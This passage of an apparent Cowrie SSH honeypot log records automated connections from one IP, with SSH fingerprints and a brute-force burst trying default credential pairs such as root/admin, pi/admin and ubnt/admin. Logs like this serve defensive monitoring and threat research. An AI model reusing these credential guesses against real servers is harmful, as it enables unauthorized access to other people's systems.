256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:20.592517Z","src_ip":"212.227.125.160","session":"192394398d71"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:20.596931Z","src_ip":"212.227.125.160","session":"b981358e8fe3"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:20.597591Z","src_ip":"212.227.125.160","session":"b981358e8fe3"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:20.600321Z","src_ip":"212.227.125.160","session":"1ded23236e57"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:20.600879Z","src_ip":"212.227.125.160","session":"1ded23236e57"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:20.602285Z","src_ip":"212.227.125.160","session":"45d207910ecb"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:20.602877Z","src_ip":"212.227.125.160","session":"45d207910ecb"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:20.607169Z","src_ip":"212.227.125.160","session":"e4e43d52e235"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:20.607602Z","src_ip":"212.227.125.160","session":"e4e43d52e235"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:20.612739Z","src_ip":"212.227.125.160","session":"6432bcc20a87"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:20.614018Z","src_ip":"212.227.125.160","session":"6432bcc20a87"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:20.616068Z","src_ip":"212.227.125.160","session":"5a88c3dc3d2f"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:20.616704Z","src_ip":"212.227.125.160","session":"5a88c3dc3d2f"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:20.618272Z","src_ip":"212.227.125.160","session":"d5776a1eaa4f"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:20.618882Z","src_ip":"212.227.125.160","session":"d5776a1eaa4f"}
{"eventid":"cowrie.login.failed","username":"pi","password":"admin","message":"login attempt [pi/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:20.981959Z","src_ip":"212.227.125.160","session":"192394398d71"}
{"eventid":"cowrie.login.failed","username":"noc","password":"admin","message":"login attempt [noc/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:20.998567Z","src_ip":"212.227.125.160","session":"1ded23236e57"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"admin","message":"login attempt [ftpuser/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:21.002186Z","src_ip":"212.227.125.160","session":"5a88c3dc3d2f"}
{"eventid":"cowrie.login.failed","username":"student","password":"admin","message":"login attempt [student/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:21.012442Z","src_ip":"212.227.125.160","session":"6432bcc20a87"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:33:21.020381Z","src_ip":"212.227.125.160","session":"45d207910ecb"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"admin","message":"login attempt [ubnt/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:21.022284Z","src_ip":"212.227.125.160","session":"e4e43d52e235"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"admin","message":"login attempt [ftpuser/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:21.023231Z","src_ip":"212.227.125.160","session":"d5776a1eaa4f"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:22.059320Z","src_ip":"212.227.125.160","session":"192394398d71"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:22.074655Z","src_ip":"212.227.125.160","session":"6432bcc20a87"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:22.083947Z","src_ip":"212.227.125.160","session":"1ded23236e57"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:22.094028Z","src_ip":"212.227.125.160","session":"d5776a1eaa4f"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:22.097214Z","src_ip":"212.227.125.160","session":"5a88c3dc3d2f"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:22.106119Z","src_ip":"212.227.125.160","session":"e4e43d52e235"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42388,"dst_ip":"1.2.3.4","dst_port":22,"session":"e890dd8405a5","protocol":"ssh","message":"New connection: 212.227.125.160:42388 (1.2.3.4:22) [session: e890dd8405a5]","sensor":"my-vps","timestamp":"2025-08-26T11:33:22.115809Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42390,"dst_ip":"1.2.3.4","dst_port":22,"session":"1e6b5bc86fef","protocol":"ssh","message":"New connection: 212.227.125.160:42390 (1.2.3.4:22) [session: 1e6b5bc86fef]","sensor":"my-vps","timestamp":"2025-08-26T11:33:22.135750Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42404,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa119c2c24b2","protocol":"ssh","message":"New connection: 212.227.125.160:42404 (1.2.3.4:22) [session: aa119c2c24b2]","sensor":"my-vps","timestamp":"2025-08-26T11:33:22.151580Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42408,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1fd093392a4","protocol":"ssh","message":"New connection: 212.227.125.160:42408 (1.2.3.4:22) [session: c1fd093392a4]","sensor":"my-vps","timestamp":"2025-08-26T11:33:22.171509Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:22.172695Z","src_ip":"212.227.125.160","session":"e890dd8405a5"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:22.173537Z","src_ip":"212.227.125.160","session":"e890dd8405a5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42412,"dst_ip":"1.2.3.4","dst_port":22,"session":"e397cf0ecf04","protocol":"ssh","message":"New connection: 212.227.125.160:42412 (1.2.3.4:22) [session: e397cf0ecf04]","sensor":"my-vps","timestamp":"2025-08-26T11:33:22.205604Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42420,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c33a99ad8ee","protocol":"ssh","message":"New connection: 212.227.125.160:42420 (1.2.3.4:22) [session: 0c33a99ad8ee]","sensor":"my-vps","timestamp":"2025-08-26T11:33:22.207009Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:22.237373Z","src_ip":"212.227.125.160","session":"1e6b5bc86fef"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:22.238619Z","src_ip":"212.227.125.160","session":"1e6b5bc86fef"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:22.241720Z","src_ip":"212.227.125.160","session":"aa119c2c24b2"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:22.242464Z","src_ip":"212.227.125.160","session":"aa119c2c24b2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56032,"dst_ip":"1.2.3.4","dst_port":22,"session":"44e8cca8a8a9","protocol":"ssh","message":"New connection: 212.227.125.160:56032 (1.2.3.4:22) [session: 44e8cca8a8a9]","sensor":"my-vps","timestamp":"2025-08-26T11:33:22.256739Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:22.258888Z","src_ip":"212.227.125.160","session":"44e8cca8a8a9"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:22.262799Z","src_ip":"212.227.125.160","session":"c1fd093392a4"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:22.263606Z","src_ip":"212.227.125.160","session":"c1fd093392a4"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:22.273324Z","src_ip":"212.227.125.160","session":"e397cf0ecf04"}
